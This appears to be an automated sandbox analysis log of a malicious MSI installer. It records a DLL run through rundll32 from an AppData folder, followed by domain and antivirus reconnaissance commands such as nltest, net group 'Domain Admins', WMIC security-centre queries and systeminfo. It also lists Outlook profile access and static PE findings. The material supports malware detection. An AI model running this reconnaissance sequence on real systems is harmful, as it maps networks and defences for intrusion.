Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI181.tmp "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 5_2_00000001800033E0
PE file contains an invalid checksum
Source: Update_cd47bedf.dll.5.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
Source: 360total.dll.1.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
PE file contains sections with non-standard names
Source: 360total.dll.1.dr Static PE information: section name: wsgi2
Source: Update_cd47bedf.dll.5.dr Static PE information: section name: wsgi2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A323C push ecx; ret 3_2_005A324F
